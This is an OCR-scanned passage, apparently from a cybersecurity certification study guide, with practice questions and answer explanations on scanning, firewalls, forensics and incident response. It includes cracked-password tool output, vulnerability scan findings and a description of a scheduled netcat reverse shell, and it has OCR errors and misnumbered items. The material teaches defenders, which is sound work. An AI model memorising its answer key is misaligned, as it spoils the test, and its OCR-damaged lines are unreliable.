TCP 
TCP 
TCP 
TCP 
TCP 
TCP 
TCP 
TCP 
TCP 
TCP 
TCP 
TCP 
TCP 
TCP 


1784 
1304 
1309 
1310 
1311 
1312 
1313 
1314 
1315 
1316 
1317 
1318 
1319 
1320 
1321 
1322 
1323 
1324 
1325 
1326 
1327 
1328 
1329 
1330 
1331 
1332 
1333 
1334 
1335 
1336 
1337 
1338 
1339 
1340 
1341 
1342 
1343 
1344 
1345 
1346 


PHP bP be bea ea Ba ee he Pe a ee Pe Pe eee be LDI 


win=512 
win=512 
win=512 
win=S12 
win=512 
Win=512 
Win=512 
win=S12 
win=512 
win=S12 
win=512 
win=S12 
win=512 
win=S12 
win=512 
win=512 
win=512 
win=S12 
win=512 
win=S12 
win=512 
win=S12 
Win=512 
win=S12 
win=512 
win=S12 
win=512 
win=S12 
win=S12 
Win=512 
win=512 
Win=512 
win=512 
win=512 
win=512 
win=S12 
Win=512 
Win=512 
Win=512 
Win=512 





Sep 16 2016 23:01:37: %ASA-4-106023: Deny tcp src outside:10.10.0.100/53534 dst 


inside:192.168.1.128/1521 by 
access-group "OUTSIDE" [0x5063b82f, 0x0] 


Sep 16 2016 23:01:38: %ASA-4-106023: Deny tcp src outside:10.10.0.100/53534 dst 


inside:192.168.1.128/1521 by 
access-group "OUTSIDE" [0x5063b82f, 0x0] 


Sep 16 2016 23:01:39: %ASA-4-106023: Deny tcp src outside:10.10.0.100/53534 dst 


inside:192.168.1.128/1521 by 
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access-group "OUTSIDE" [0x5063b82f, 0x0] 

Sep 16 2016 23:01:40: %ASA-4-106023: Deny tcp src outside:10.10.0.100/53534 dst 
inside:192.168.1.128/1521 by 

access-group "OUTSIDE" [0x5063b82f, 0x0] 


What service is the remote system most likely attempting to access? 


A. H.323 
B. SNMP 
C. MS-SQL 
D. Oracle 


After finishing a forensic case, Lucas needs to wipe the media that he is using to prepare it 
for the next case. Which of the following methods is best suited to preparing the SSD that 
he will use? 


A. Degauss the drive. 

B. Zero write the drive. 

C. UseaPRNG. 

D. Use the ATA Secure Erase command. 


Dylan is creating a vulnerability management program for his company. He only has the 
resources to conduct daily scans of approximately 10 percent of his systems, and the rest 
will be scheduled for weekly scans. He would like to ensure that the systems containing the 
most sensitive information receive scans on a more frequent basis. What criteria is Dylan 
using? 


A. Data privacy. 

B. Data remnance. 

C. Data retention. 

D. Data classification. 


While investigating a cybersecurity incident, Bob discovers the file shown here stored on a 
system on his network. Which one of the following tools most likely generated this file? 


Loaded 3107 password hashes with 3107 different salts (bsdicrypt, BSDI crypt(3) [DES 128/128 SSE2-16]) 


nguyen (u726-bsdi) 
gemini (u1081-bsdi) 
rachel (u105-bsdi) 
qqqiil (u2542-bsdi) 
aylmer (u1713-bsdi) 
Snoopy (u884-bsdi) 
0U812 (u347-bsdi) 
Friends (u873-bsdi) 
Anthony (u519-bsdi) 
Michelle (u879-bsdi) 
Knight (u876-bsdi) 
Sierra (u883-bsdi) 
Victoria (u1628-bsdi) 
Darkman (u1538-bsdi) 
Gandalf (u1549-bsdi) 
Cardinal (u1527-bsdi) 
ABC123 (u2933-bsdi) 
Mellon (u1580-bsdi) 
Sidekick (u1611-bsdi) 
techno (u337-bsdi) 
Tigger (u527-bsdi) 
mustang (u2417-bsdi) 


—More—— 
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A. Cain & Abel 

B. Metaspolit 

C. ftk 

D. John the Ripper 

Which one of the following tools cannot be used as a web application vulnerability 
scanner? 

A. Nikto 

B. Acunetix 

C. Nmap 

D. QualysGuard 


Peter is designing a vulnerability scanning program for the large chain of retail stores 
where he works. The store operates point-of-sale terminals in its retail stores as well as an 
e-commerce website. Which one of the following statements about PCI DSS compliance is 


not true? 

A. Peter’s company must hire an approved scanning vendor to perform vulnerability 
scans. 

B. The scanning program must include, at a minimum, weekly scans of the internal 
network. 

C. The point-of-sale terminals and website both require vulnerability scans. 

D. Peter may perform some required vulnerability scans on his own. 


Rachel discovered the vulnerability shown here when scanning a web server in her organi- 
zation. Which one of the following approaches would best resolve this issue? 


v 
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WWMM | 4 Microsoft IIS Server XSS Elevation of Privilege Vulnerability (MS17-016) CVSS: - CVSS3:- New [dv] 
First Detected: 04/04/2017 at 21:52:03 (GMT-0400) Last Detected: 04/04/2017 at 21:52:03 (GMT-0400) Times Detected: 1 Last Fixed: N/A 
QID: 91339 CVSS Base: 4.3 

Category: Windows CVSS Temporal: 3.2 

CVE ID: CVE-2017-0055 CVSS3 Base: 6.1 

Vendor Reference MSi7-016 CVSS3 Temporal: 5.3 

Bugtraq ID: 96622 CVSS Environment: 

Service Modified: 03/17/2017 Asset Group: 

User Modified: - Collateral Damage Potential: 

Edited: No Target Distribution: 

PCI Vuln: Yes Confidentiality Requirement: 

Ticket State: Open Integrity Requirement: 


Availability Requirement: 


THREAT: 

An elevation of privilege vulnerability exists when Microsoft IIS Server fails to properly sanitize a specially crafted request. 

An attacker who successfully exploited this vulnerability could then perform cross-site scripting attacks on affected systems and run script in the security context of the current user. 

These attacks could allow the attacker to read content that the attacker is not authorized to read, use the victim's identity to take actions on behalf of the victim, and inject malicious content 
in the victims browser. 


Patching the server 
Performing input validation 
Adjusting firewall rules 


Rewriting the application code 
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65. Charleen’s incident response team is fighting a rapidly spreading zero-day malware package 
that silently installs via Adobe Flash a vulnerability when an email attachment is viewed via 
webmail. After identifying a compromised system, she determines that the system is bea- 
coning to a group of fast flux DNS entries. Which of the following techniques is best suited 
to identifying other infected hosts? 


66. 


67. 


A. 
B. 
C. 
D. 


Update antivirus software and scan using the latest definitions. 
Monitor for the IP addresses associated with the command-and-control systems. 
Log DNS queries to identify compromised systems. 


Check email logs for potential recipients of the message. 


What nmap feature is enabled with the -0 flag? 


A. 
B. 
C. 
D. 


OS detection 
Online/offline detection 
Origami attack detection 


Origination port validation 


Mika uses a security token like the unit shown here and a password to authenticate to her 
PayPal account. What two types of factors is she using? 
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WV) VeriSign® 
ID protection 





Something she knows and something she has 
Something she knows and something she is 
Something she is and something she has 


Mika is only using one type of factor because she knows the token code and her 
password. 
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68. Jose is working with his manager to implement a vulnerability management program for 


69. 


70. 


71. 


his company. His manager tells him that he should focus on remediating critical and high- 
severity risks to externally accessible systems. He also tells Jose that the organization does 
not want to address risks on systems without any external exposure or risks rated medium 
or lower. Jose disagrees with this approach and believes that he should also address critical 
and high-severity risks on internal systems. How should he handle the situation? 


A. Jose should recognize that his manager has made a decision based upon the organiza- 
tion’s risk appetite and should accept it and carry out his manager’s request. 


B. Jose should discuss his opinion with his manager and request that the remediation cri- 
teria be changed. 


C. Jose should ask his manager’s supervisor for a meeting to discuss his concerns about 
the manager’s approach. 


D. Jose should carry out the remediation program in the manner that he feels is appropri- 
ate because it will address all of the risks identified by the manager as well as addi- 
tional risks. 


Susan needs to test thousands of submitted binaries. She needs to ensure that the applica- 
tions do not contain malicious code. What technique is best suited to this need? 


A. Sandboxing 
B. Implementing a honeypot 
C. Decompiling and analyzing the application code 


D. Fagan testing 


Which one of the following is an example of a logical control? 

A. Lock and key 

B. Firewall rule 

C. Background check 

D. Security guard 

Chris is implementing cryptographic controls to protect his organization and would like to 
use defense-in-depth controls to protect sensitive information stored and transmitted by a 


web server. Which one of the following controls would be least suitable to directly provide 
this protection? 


A. TLS 
B. VPN 
C. DLP 
D. FDE 
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Alex needs to deploy a solution that will limit access to his network to only authorized 
individuals while also ensuring that the systems that connect to the network meet his orga- 
nization’s patching, antivirus, and configuration requirements. Which of the following 
technologies will best meet these requirements? 


A. Whitelisting 
B. Port security 
C. NAC 

D. EAP 


Chris has been tasked with removing data from systems and devices that leave his organi- 
zation. One of the devices is a large multifunction device that combines copying, fax, and 
printing capabilities. It has a built-in hard drive to store print jobs and was used in an office 
that handles highly sensitive business information. If the multifunction device is leased, 
what is his best option for handling the drive? 


A. Destroy the drive. 
B. Reformat the drive using the MFD’s built-in formatting program. 
C. Remove the drive and format it using a separate PC. 


D. Remove the drive and purge it. 


Rhonda recently configured new vulnerability scans for her organization’s data center. Com- 
pleting the scans according to current specifications requires that they run all day, every day. 
After the first day of scanning, Rhonda received complaints from administrators of network 
congestion during peak business hours. How should Rhonda handle this situation? 


A. Adjust the scanning frequency to avoid scanning during peak times. 


B. Request that network administrators increase available bandwidth to accommodate 
scanning. 


C. Inform the administrators of the importance of scanning and ask them to adjust the 
business requirements. 


D. Ignore the request because it does not meet security objectives. 
After restoring a system from 30-day-old backups after a compromise, administrators at 
Michelle’s company return the system to service. Shortly after that, Michelle detects similar 


signs of compromise again. Why is restoring a system from a backup problematic in many 
cases? 


A. Backups cannot be tested for security issues. 

B. Restoring from backup may reintroduce the original vulnerability. 

C. Backups are performed with the firewall off and are insecure after restoration. 

D. Backups cannot be properly secured. 

Captured network traffic from a compromised system shows it reaching out to a series of five 


remote IP addresses that change on a regular basis. Since the system is believed to be compro- 
mised, the system’s Internet access is blocked, and the system is isolated to a quarantine VLAN. 


When forensic investigators review the system, no evidence of malware is found. Which of 
the following scenarios is most likely? 


A. The system was not infected, and the detection was a false positive. 


B. The beaconing behavior was part of a web bug. 
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C. The beaconing behavior was due to a misconfigured application. 


D. The malware removed itself after losing network connectivity. 


Which one of the following ISO standards provides guidance on the development and 
implementation of information security management systems? 


A. ISO 27001 
B. ISO 9000 

C. ISO 11120 
D. ISO 23270 


Mika’s forensic examination of a compromised Linux system is focused on determining 
what level of access attackers may have achieved using a compromised www account. Which 
of the following is not useful if she wants to check for elevated privileges associated with 
the www user? 


A. /etc/passwd 

B. /etc/shadow 

C. /etc/sudoers 

D. /etc/group 

Tracy is validating the web application security controls used by her organization. She 
wants to ensure that the organization is prepared to conduct forensic investigations of 


future security incidents. Which one of the following OWASP control categories is most 
likely to contribute to this effort? 


A. Implement logging 

B. Validate all inputs 

C. Parameterize queries 

D. Error and exception handling 

Gary is using agent-based scanning to assess the security of his environment. Every time that 
Gary runs a vulnerability scan against a particular system, it causes the system to hang. He 
spoke with the system administrator who provided him with a report showing that the system 
is current with patches and has a properly configured firewall that allows access only from 

a small set of trusted internal servers. Gary and the server administrator both consulted the 


vendor, and they are unable to determine the cause of the crashes and suspect that it may be a 
side effect of the agent. What would be Gary’s most appropriate course of action? 


A. Approve an exception for this server. 

B. Continue scanning the server each day. 

C. Require that the issue be corrected in 14 days and then resume scanning. 

D. Decommission the server. 

Brent’s organization runs a web application that recently fell victim to a man-in-the-middle 
attack. Which one of the following controls serves as the best defense against this type of attack? 
A. HTTPS 

B. Input validation 
C. Patching 
D 


Firewall 
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82. During an nmap port scan using the -sV flag to determine service versions, Sarah discovers 
that the version of SSH on the Linux system she is scanning is not up-to-date. When she 
asks the system administrators, they inform her that the system is fully patched and that the 
SSH version is current. What issue is Sarah most likely experiencing? 


A. The system administrators are incorrect. 
B. The nmap version identification is using the banner to determine the service version. 


C. nmap does not provide service version information, so Sarah cannot determine version 
levels in this way. 


D. The systems have not been rebooted since they were patched. 


83. Tyler scans his organization’s mail server for vulnerabilities and finds the result shown here. 
What should be his next step? 


Microsoft Exchange Client Access Server Information Di... Plugin Details 
. Severity: Medium 

Description 

ID: 77026 
The Microsoft Exchange Client Access Server (CAS) is affected by an information disclosure vulnerability. Version: $Revision: 1.2 $ 
A remote, unauthenticated attacker can exploit this vulnerability to learn the server's internal IP address. Tiiä: 

ype: remote 

Family: Windows 
Solution Published: 2014/08/06 

Modified: 2015/09/24 


There is no known fix at this time. 


Risk Information 


See Also 
http://foofus.net/?p=758 Risk Factor: Medium 
CVSS Base Score: 5.0 
Output CVSS Vector: CVSS2#AV:N/AC:L/Au:N/C:P 
A:N/A:N 
Nessus was able to verify the issue with the following request : CVSS Temporal Vector: CVSS2#E:ND/RL:U 
/RC:ND 


GET /autodiscover/autodiscover.xml HTTP/1.0 

Accept-Charset: iso-8859-1,utf-8;q=0.9,*;q=0.1 CVSS Temporal Score: 5.0 
Accept-Language: en 

Connection: Close 

User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0) 

Pragma: no-cache Vulnerability Information 
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, */* 


Which returned the following IP address : CPE: cpe:/a:microsoft:exchange_server 
192.168.0.111 Exploit Available: true 

Exploit Ease: Exploits are available 
vanes — Vulnerability Pub Date: 2014/08/01 
443 / tcp / www Exploited by Nessus: true 


Reference Information 


BID: 69018 


Shut down the server immediately. 
Initiate the change management process. 


Apply the patch. 
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84. Carla is performing a penetration test of a web application and would like to use a software 
package that allows her to modify requests being sent from her system to a remote web 
server. Which one of the following tools would not meet Carla’s needs? 


85. 


A. 
B. 
C. 
D. 


Nessus 

Burp 

ZAP 

Tamper Data 


Alex learns that a recent Microsoft patch covers a zero-day exploit in Microsoft Office that 
occurs because of incorrect memory handling. The flaw is described as potentially resulting 
in memory corruption and arbitrary code execution in the context of the current privilege 
level. Exploitation of the flaws can occur if victims open a specifically crafted Office docu- 
ment in a vulnerable version of Microsoft Office. 


If Alex finds out that approximately 15 of the workstations in his organization have been 
compromised by this malware, including one workstation belonging to a domain adminis- 
trator, what phase of the incident response process should he enter next? 


A. 


B. 
C. 
D 


Preparation 
Detection and analysis 
Containment, eradication, and recovery 


Post-incident activity 
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Appendix = Answers to Review Questions 


Chapter 1: Domain 1: Threat 
Management 


1. 


C. DNS reverse lookup is an active technique. Google and Shodan are both search 
engines, while a PGP key server does not interact with the target site and is considered 
passive reconnaissance. If you’re not immediately familiar with a technique or technology, 
you can often reduce the possible options. Here, ruling out a Google search or querying 

a PGP server are obviously not active techniques, and Shodan also says it is a search, 
making a DNS reverse lookup a good guess, even if you’re not familiar with it. 


A. While it may seem strange, a DNS brute-force attack that queries a list of IPs, common 
subdomains, or other lists of targets will often bypass intrusion detection and prevention 
systems that do not pay particular attention to DNS queries. Cynthia may even be able to 
find a DNS server that is not protected by the organization’s IPS! 


nmap scans are commonly used during reconnaissance, and Cynthia can expect them to be 
detected since they are harder to conceal. Cynthia shouldn’t expect to be able to perform a 
zone transfer, and if she can, a well-configured IPS should immediately flag the event. 


C. The Microsoft Baseline Security Analyzer (MBSA) is a tool provided by Microsoft that 
can identify installed or missing patches as well as common security misconfigurations. 
Since it is run with administrative rights, it will provide a better view than normal nmap 
and Nessus scans and provides more detailed information about specific patches that are 
installed. Metasploit provides some limited scanning capabilities but is not the best tool 
for the situation. 


C. Reconnaissance efforts do not include exploitation, and Charleen should not expect to 
need to include exploitation limitations in the rules of engagement. If she was conducting 
a full penetration test, she would need to make sure she fully understands any concerns or 
limitations her client has about exploitation of vulnerabilities. 


C. MySQL uses port 3306 as its default port. Oracle uses 1521, Postgres uses 5432, and 
Microsoft SQL uses 1433/1434. 


B. Heuristic detection methods run the potential malware application and track what 
occurs. This can allow the anti-malware tool to determine whether the behaviors and 
actions of the program match those common to malware, even if the file does not match 
the fingerprint of known malware packages. 


A. Cynthia’s first action should be to determine whether there is a legitimate reason for 
the workstation to have the listed ports open. 


D. bcrypt is a strong password hashing algorithm that includes salts for the stored values. 
If Charles uses bcrypt, he will have made the best choice from the list, as both MDS and 
SHA-1 are not as strong, even with a salt. Encrypting the database may seem like a good 
idea, but storing plain-text passwords means that an exploit that can read the database 
while it is decrypted will get plain-text passwords! 


9. 


10. 


11. 


12. 


13. 


14. 


15. 


16. 


17. 


18. 
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B. These commands will add filters to the INPUT ruleset that block traffic specifically 
from hosts A and B, while allowing only port 25 from host C. Option D might appear 
attractive, but it allows all traffic instead of only SMTP. Option A only drops SMTP 
traffic from host B (and all of the other hosts in its /24 segment), while Option C 
allows traffic in from the hosts you want to block! 


B. While it may be tempting to start immediately after finishing scoping, Jessica’s next 
step should be to ensure that she has appropriate sign-off and agreement to the scope, 
timing, and effort involved in the test. 


C. The NIST process focuses on escalating privileges before browsing the system. If Brian 
was fortunate enough to compromise an administrative account remotely, he could skip 
this step, but in most cases, his next step is to find a local exploit or privilege escalation 
flaw that will allow him to have more control over the system. 


C. Fortunately, the sshd service has a configuration setting called PermitRootLogin. Set- 
ting it to no will accomplish Chris’s goal. 


C. During penetration tests, red teams are attackers, blue teams are defenders, and the 
white team establishes the rules of engagement and performance metrics for the test. 


A. Charles can see that no invalid logins occurred and that someone logged in as the 
user after business hours. This means that the account has likely been compromised and 
that he should investigate how the password was lost. (In many cases, Charles needs to 
ask the VP of finance about bad password habits like writing it down or using a simple 
password.) 


C. Detection systems placed in otherwise unused network space will detect scans that 
blindly traverse IP ranges. Since no public services are listed, attackers who scan this 
range can be presumed to be hostile and are often immediately blocked by security devices 
that protect production systems. 


B. A jump host, or jump box, allows for easier logging of administrative access and can 
serve as an additional layer of protection between administrative workstations and the 
protected network. In this case, Angela’s needs are best served by a jump host. Bastion 
hosts are fully exposed to attacks; administrative virtual machines can be useful but don’t 
make central auditing quite as easy and may allow a compromised virtual machine host to 
be a problem. Finally, direct ssh or RDP requires auditing of all administrative worksta- 
tions and could allow a compromised workstation to cause issues by allowing it to directly 
connect to the secure network. 


C. This flow sample shows four distinct hosts being accessed from 192.168.2.1. They are 
10.2.3.1, 10.6.2.4, 10.6.2.5, and 10.8.2.5. 


B. This setting blocks all logins for 120 seconds when five failed attempts occur within 
60 seconds. This can slow down brute-force hacking attempts, but Rick should recom- 
mend that the organization he is working with may want to consider properly isolating the 
administrative interfaces via a protected network segment instead of just using a back-off 
algorithm if they haven’t already. 
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19. 


20. 


21. 


22. 


23. 


24. 


25. 


26. 


27. 


28. 


Appendix = Answers to Review Questions 


B. The U.S. DoD Trusted Foundry program works to assure the integrity and confiden- 
tiality of integrated circuit design and manufacturing. This helps to ensure that agents of 
foreign governments are not able to insert flaws or code into the ICs that could be lever- 
aged for intelligence or cyberwarfare activities. 


D. netstat is found on Windows, Linux, and macOS systems and can provide informa- 
tion about other systems on the network and can provide information about open ports 
and systems that the host has connected to. Chris can search for common web and data- 
base server service ports to help identify the local targets he is looking for. 


B. The NIST SP 800-115 guide describes four penetration testing phases: planning, dis- 

covery, attack, and reporting. Alice is conducting a discovery activity. During this phase, 
she might also scan systems and networks, perform passive intelligence gathering, or use 
tools to gather additional information about her target. 


C. By default, nmap uses a TCP SYN scan. If the user does not have proper socket privi- 
leges (such as root on a Linux system), it will use a TCP connect scan. 


D. netcat, telnet, and wget can all be used to conduct Isaac’s banner-grabbing exercise. 
FTP will not connect properly to get the banner he wants to see. 


A. Limiting the information available about an organization by requiring authentication 
will strongly limit the ability of potential attackers to gather information. Secure domain 
registration may conceal the registration contact’s information but does not provide any 
real additional protection. Limiting technologies listed in a job posting can help limit 
what attackers may find out, but most organizations would prefer to better match candi- 
dates. Finally, purging all metadata can help protect information about internal systems 
and devices but is difficult to enforce, and document metadata is not a primary source of 
information about most organizations. 


B. Since Cassandra is scanning a wireless network and the system is using an IP address 
that is commonly used for commodity wireless routers, her best guess should be that this 
is a wireless router that can be accessed via ssh and that is providing a web management 
interface and print services. The OS fingerprinting that nmap provides is not always reli- 

able, and the VirtualBox match is a false positive in this case. The actual host scanned is 
an Asus router running open source firmware and additional software. 


C. The device allows a telnet connection to port 10001 and identifies itself as an auto- 
mated tank gauge. John should recommend disabling telnet or protecting the device with 
a firewall or other security device to prevent unauthorized remote access. 


B. The command nbtstat -c shows the contents of the NetBIOS name cache and shows 
a list of name-to-IP address mappings. 


C. The Wayback Machine and similar sites capture periodic snapshots of websites from 
across the Internet, allowing penetration testers and others performing reconnaissance 
activities to gather information from historic versions of their target sites. This also means 
that long-term data breaches may be archived in sites like these in addition to search 
engine caches. 


29. 


30. 


31. 


32. 


33. 


34. 


35. 


36. 


37. 


38. 
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D. nmap provides Common Platform Enumeration data when the -0 (OS fingerprint- 
ing) and verbose flags are used. If Kristen had seen the -sV flag instead, she would have 
expected service version information. 


B. Banner grabbing is an active process and requires a connection to a remote host to 
grab the banner. The other methods are all passive and use third-party information that 
does not require a direct lookup against a remote host. 


D. While the hostnames cluster1 and clusterla indicate that there may be a cluster 
of mail servers, this query does not prove that. Instead, Charleen knows that there are 
two MX entries for her target. She will also notice that mail hosting is handled by mes- 
sagelabs, a software-as-a-service provider for email and other managed services, indicat- 
ing that the public email presence for her target is handled by a specialized company. 
MX Toolbox allows deeper queries about blacklists and SMTP tests, but this image only 
shows the links to them and does not provide details. 


B. nmap supports the use of both HTTP and SOCKS4 proxies, allowing Alex to configure 
the remote host as an HTTP proxy and bounce his scans through it. This can allow nmap 
users to leverage their scanning tools without installing them on a protected host or network. 


D. This chart shows typical latency for a remote system and minimal or at times zero 
packet loss. This chart shows normal operations, and John can safely report no visible 
Issues. 


B. By default Apache does not run as an administrative user. In fact, it typically runs as 
a limited user. To take further useful action, Frank should look for a privilege escalation 
path that will allow him to gain further access. 


D. Caitlyn is preparing a decomposition diagram that maps the high-level functions to 
lower-level components. This will allow her to better understand how the malware pack- 
age works and may help her identify areas she should focus on. 


C. Alex knows that systems that are exposed to the Internet like DMZ systems are con- 
stantly being scanned. She should rate the likelihood of the scan occurring as high. In 
fact, there is a good chance that a scan will be occurring while she is typing up her report! 


C. Availability analysis targets whether a system or service is working as expected. While 
an SIEM may not have direct availability analysis capabilities, reporting on when logs and 
other data are not received from source systems can help detect outages. Ideally, Lucy’s 
organization should be using a system monitoring tool that can alarm on availability 
issues as well as common system problems such as excessive memory, network, disk, or 
CPU usage. 


C. When faced with massive numbers of notification messages that are sent too aggres- 
sively, administrators are likely to ignore or filter the alerts. Once they do, they are 
unlikely to respond to actual issues, causing all of the advantages of monitoring to be 
lost. If she doesn’t spend some time identifying reasonable notification thresholds and 
frequencies, Lucy’s next conversation is likely to be with an angry system administrator 
or manager. 
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40. 


41. 


42. 


43. 


44. 


45. 


46. 
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D. Lucy has configured a behavior-based detection. It is likely that a reasonable percent- 
age of the detections will be for legitimate travel for users who typically do not leave the 
country, but pairing this behavioral detection with other behavioral or anomaly detections 
can help determine whether the login is legitimate. 


C. John is performing static analysis, which is analysis performed without running code. 
He can use tools or manually review the code (and, in fact, is likely to do both). 


B. Lauren’s team should use full-disk encryption or volume encryption and should secure 
the encryption keys properly. This will ensure that any data that remains cannot be 
exposed to future users of the virtual infrastructure. While many cloud providers have 
implemented technology to ensure that this won’t happen, Lauren can avoid any potential 
issues by ensuring that she has taken proactive action to prevent data exposure. Using a 
zero wipe is often impossible because virtual environments may move without her team’s 
intervention, data masking will not prevent unmasked data or temporary data stored on 
the virtual disks from being exposed, and spanning multiple virtual disks will still leave 
data accessible, albeit possibly in fragmented form. 


C. When endpoints are connected without a network control point between them, a host- 
based solution is required. In this case, Lucca’s specific requirement is to prevent attacks, 
rather than simply detect them, meaning that a HIPS is required to meet his needs. Many 
modern products combine HIPS capabilities with other features such as data loss preven- 
tion and system compliance profiling, so Lucca may end up with additional useful capa- 
bilities if he selects a product with those features. 


B. By default, an iptables firewall will have INPUT, OUTPUT, and FORWARD chains. Geoff 
should use the DROP command on all three to stop all traffic to or from a machine. 


B. Most SaaS providers do not want their customers conducting port scans of their ser- 
vice, and many are glad to provide security assertions and attestations including audits, 
testing information, or contractual language that addresses potential security issues. 
Using a different scanning tool, engaging a third-party tester, or even using a VPN are not 
typically valid answers in a scenario like this. 


A. Device manufacturer identification relies on the MAC address that includes a vendor 
prefix. Since MAC addresses can be changed in software, this is not guaranteed to be 
accurate, but in most cases, you can reasonably expect it to match the manufacturer of the 
NIC. The complete list of prefixes can be found at http: //standards-oui.ieee.org/ 
oui/oui. txt. 


C. While spam to a registrant’s email address may seem trivial, it may mean that impor- 
tant messages related to the domain are missed. The best way to limit this is to use a 
privacy or proxy service to register the domain. Many, if not most, popular registration 
services offer a privacy service, sometimes at an extra charge. Unfortunately, if a domain 
was previously registered before privacy services or proxies are used, that information can 


be looked up and used. 


B. Of these answers, only Shodan provides a searchable listing of vulnerable hosts includ- 
ing details of the system that was scanned. OpenVAS, CVE, and nmap do not provide 
central databases of vulnerable systems. 


48. 


49. 


50. 


51. 


52. 


53. 


54. 


55. 


56. 


57. 
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C. Netcat can act asa relay, file transfer tool, reverse shell, TCP banner grabber, TCP 
port scanner, and in a multitude of other roles, but it does not include encryption capabili- 
ties. If Adam needs to encrypt his data, he will need another tool to perform that task. 


A. Wireshark can be used to capture network traffic, allowing you to review traffic 
information to build a network topology based on time to live, IP addresses, and other 
information. nmap and SolarWinds Network Mapper both rely on active scans to generate 
topologies, and Nessus does not provide a network topology generation capability. 


C. Google dorks are advanced search strings that can help locate information that is oth- 
erwise difficult to find. They can be used to find things like SQL injection, login pages, 
links, domain-specific information, and a host of other data. 


A. A review of operational controls will often look at change management, separation 

of duties and other personnel controls, and process-based controls. Many administrative 
controls are part of an operational control review. These are sometimes conducted as Ser- 
vice Organization Control (SOC) audits with SOC 1, 2, and 3 reports generated depend- 
ing on the level and depth of the assessment. 


B. Olivia’s first action should be to contact the device administrator. There is no indica- 
tion that the device has been compromised, and logging in to validate the finding is not 
typically part of a reconnaissance process. 


B. Tripwire and similar programs are designed to monitor a file for changes and to report 
on changes that occur. They rely on file fingerprints (hashes) and are designed to be reli- 
able and scalable. Kathleen’s best bet is to use a tool designed for the job, rather than to 
try to write her own. 


B. The best option in this list for Selah’s purposes is theHarvester. It combines search 
engine—based searches with Shodan and other data sources to gather email addresses, 
subdomain information, employee names, and a variety of other types of useful footprint- 
ing data. Nmap is useful for port scanning but typically won’t find email addresses and 
employee names, Shodan is a vulnerability search engine, and osint-ng is a made-up tool 
name. 


B. ESP packets are part of the IPSEC protocol suite and are typically associated with a 
tunnel or VPN. Ryan should check for a VPN application and determine what service or 
system the user may have connected to. 


D. The strings command extracts strings of printable characters from files, allowing 
Ben to quickly determine the contents of files. Grep would require knowing what he is 

looking for, either the more or less command will simply display the file, which is often 
not a useful strategy for binaries. 


B. Changing the hosts file has been used by various malware packages to prevent updates 
by stopping DNS resolution of the antivirus updates update server. Lauren should check 
to see whether the antivirus on the system is up-to-date but will probably need to recom- 
mend a rebuild or reinstallation of the system. 


314 


58. 


59. 


60. 


61. 
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63. 


64. 


65. 


66. 
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B. Alice’s suspicious user appears to be attempting to crack LANMAN hashes using a 
custom word list. The key clues here are the john application, the LM hash type, and the 
location of the word list. 


C. nmap’s Common Platform Enumeration is a standardized way to name applications, 
operating systems, and hardware. CPE output starts with cpe: /a for applications, /h for 
hardware, and /o for operating systems. 


D. Detecting port scans requires the ability to identify scanning behavior, and the appli- 
cations that create syslog entries on most default Linux distributions are not set up for 
this. Charles should identify a tool like psad, an IDS package, or other tool that can track 
connections and scan behavior and report on it and then use syslog to send those messages 
to his log collector or SIEM. 


C. To show current NetBIOS sessions and their status, Alex can issue the nbtstat -s 
command. The -c flag shows the NetBIOS name cache, while the -r command displays 
the count of NetBIOS names resolved through a WINS server query and by broadcast. 
There is no -o flag. 


D. The service running from the ww directory as the user apache should be an immedi- 
ate indication of something strange, and the use of webmin from that directory should also 
be a strong indicator of something wrong. Lucas should focus on the web server for the 
point of entry to the system and should review any files that the Apache user has created 
or modified. If local vulnerabilities existed when this compromise occurred, the attacker 
may have already escalated to another account! 


D. The passwd binary stands out as having recently changed. This may be innocuous, 
but if Angela believes the machine was compromised, there is a good chance the passwd 
binary has been replaced with a malicious version. She should check the binary against a 
known good version and then follow her incident response process if it doesn’t match. 


A. Using SYN cookies allows a server to act as though its SYN queue is larger than it is, 
reducing or completely preventing the issues encountered during a SYN flood. Discarding 
SY Ns from the queue and waiting for a SYN-ACK allows the server to prevent resource 
exhaustion while still responding to legitimate connection requests. Of course, SYN cook- 
ies do nothing against DOS attacks that go further than a SYN flood! 


B. As attacks succeed, they will often create additional opportunities for discovery, result- 
ing in more attacks. Planning the test itself, as well as the final reporting phase, should 
occur only once per penetration test. 


D. Geoff’s only sure bet to prevent these services from being accessed is to put a network 
firewall in front of them. Many appliances enable services by default; since they are appli- 
ances, they may not have host firewalls available to enable. They also often don’t have 
patches available, and many appliances do not allow the services they provide to be dis- 


abled or modified. 


B. Exiftool provides access to image and document metadata, including information 
about the camera, geotagging, time and date information, and a variety of other useful 
metadata if it is present. Strings is useful for pulling text from files but does not provide 
usefully formatted metadata. Wireshark is a packet capture utility, and stegdetect is used 
to detect steganographically concealed data in files. 
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A. The at command can be used to schedule Windows tasks. This task starts netcat as 
a reverse shell using cmd.exe via port 443 every Friday at 8:30 p.m. local time. Lauren 
should be concerned, as this allows traffic in that otherwise might be blocked! 


C. Using self-signed certificates for services that will be used by the general public or 
organizational users outside of a small testing group can be an issue because they will 
result in an error or warning in most browsers. The TLS encryption used for HTTPS 
will remain just as strong regardless of whether the certificate is provided by a certificate 
authority or self-signed, and a self-signed certificate cannot be revoked at all! 


A. The net use command will list any network shares that the workstation is using, 
allowing Isaac to identify file servers or others with file sharing that the workstation is 
configured to use. net user will show user accounts for the local PC, net group is only 
usable on domain controllers, and net config allows the server and workstation services 
to be controlled. 


A. Pretexting is a form of social engineering that relies on lies about the social engineer’s 
motives. In this case, Fred is giving his targets reasons to believe he is legitimately a mem- 
ber of the organization’s support team. OSINT refers to open source intelligence, which is 
data gathered from public sources. A tag-out sometimes refers to handing off to another 
member of a penetration test team, while profiling is conducted while gathering informa- 
tion about an individual, team, or organization before conducting a social engineering 
attack. 


D. The uses described for the workstation that Geoff is securing do not require inbound 
access to the system on any of these ports. Web browsing and Active Directory domain 
membership traffic can be handled by traffic initiated by the system. 


B. Network flows can be used to identify traffic patterns between systems that are atypi- 
cal or that connect to systems that are known malware or malicious sites. Using his SIEM, 
Lucca can look for top talkers, behavior or trend-based anomalies, or other correlations 
that point to an issue. 


A. Automated shunning, whether via an IPS or other technology, can block attackers but 
can also prevent penetration testers from being able to conduct scans or attacks. When 
planning a white-box penetration test, it is typical to discuss the presence of technologies 
that may block or limit the test and to either work around them or to disable them for the 
tester’s IP addresses if they are not directly in scope. 


C. While the first three ports are common to many of the devices listed, TCP 515 is the 
